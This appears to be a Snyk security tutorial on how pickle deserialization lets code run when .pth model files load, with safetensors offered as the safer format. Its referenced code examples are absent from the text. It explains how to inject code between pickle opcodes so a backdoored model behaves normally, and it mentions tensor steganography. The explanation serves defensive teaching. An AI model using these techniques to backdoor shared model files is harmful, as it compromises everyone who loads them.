Python Pickle Poisoning and Backdooring Pth Files
Python's pickle module is powerful for object serialization but poses security risks, as deserializing untrusted files can execute malicious code. This is particularly relevant in machine learning workflows using shared .pth files.
We will be covering pickle examples and PyTorch examples. Let’s begin with checking your PyTorch setup.
If you need to install PyTorch, the process can vary quite a bit depending on your setup – it is advisable to follow the instructions here.
You can check the version and protocol of your pickle install like so:
The pickle module is included in Python’s standard library, so there is no need to run an installation command like pip install pickle.
What is Pickle in Python?
The pickle library is Python’s native serialization protocol. It can store complex Python objects as a sequence of “opcodes”, which are a series of executable instructions for rebuilding the serialized object. Pickle will even preserve object references and relationships between objects.
Now, we will explore some hands-on examples of arbitrary code execution exploits in pickle.
Poisoning Python Pickles with Malicious Code
We’re going to create a pickle file and insert an instance of a class containing arbitrary code we want to execute during the deserialization of the file. Then, we will show off how an end user of this file might end up loading this pickle file, thereby engaging this vulnerability.
In our example, we just print a simple Hello World. But a malicious sample might include ransomware.
Poisoning Pytorch Model Pth files with Malicious Code
A similar process of embedding malicious code can be applied to pth files.
This could be tackled more elegantly, with more versatility, by using fickling to inject the code directly. But, this code allows us to take a minimal look at what enables this vulnerability. In this case, the opcodes composing the pickle file are loaded, and our potentially malicious code is injected in between the existing opcodes, such that the end user loading this model would not see a difference in the functionality of the loaded model.
Sharing model weights with Safetensors
Preferably, neural network weights would be shared in the safetensors format to begin with. We can modify our example above to demonstrate one way of exporting to this format in PyTorch.
The resulting safetensors file contains the corresponding weights, which can be paired with the architecture already defined by the code to load the model fully. But, many models, especially older models, will not have adopted this workflow. Pickle files are still widely distributed, and the pickle serialization format is still the default when saving neural networks trained in PyTorch.
Other Exploitations of Object Deserialization
Neural network weights are not the only data stored in object serialization formats like pickle. Entire datasets are often also stored as pickle files, and in the R programming language datasets are often stored as RDS files, for example.
It is also possible to embed malicious code directly into the tensors – the model weights themselves – by encoding malicious code in such small perturbations to the weights that the impact on the model’s accuracy is minimal. This process is called tensor steganography. This can be paired with pickle deserialization exploits to produce an especially stealthy attack vector: it may appear that pickle is simply deserializing a tensor when in reality it is also reconstructing malicious code in memory for execution. This still requires exploiting the pickle format's vulnerability, though – safetensors would not reconstruct and execute the embedded malicious code in memory.
Generative AI workflows can also include files for customization and extension of the abilities of a base model – users will often find themselves downloading LORAs, ControlNets, IPAdapter variants, or even Textual Inversion checkpoints. The same general principles discussed here also apply to these types of files – LORAs are commonly shared in the safetensors format, but for the others, it is less common. Be careful when downloading files that were serialized using pickle.
Additional Hands-on Practice
Snyk offers a CTF (Capture The Flag) event that relies on this exploit and teaches you how to exploit vulnerabilities related to Python Pickle. The Python exploit lab is called Sauerkraut, and is covered by John Hammond here.
To learn more about Python application security and vulnerabilities such as Code Injection, XPath injection, and others you’re highly encouraged to visit Snyk Learn’s Python developer security lessons.

Snyk Prioritizes Developer Experience
Find out why developer experience is so critical and how Snyk enables a more streamlined developer experience with our newest features.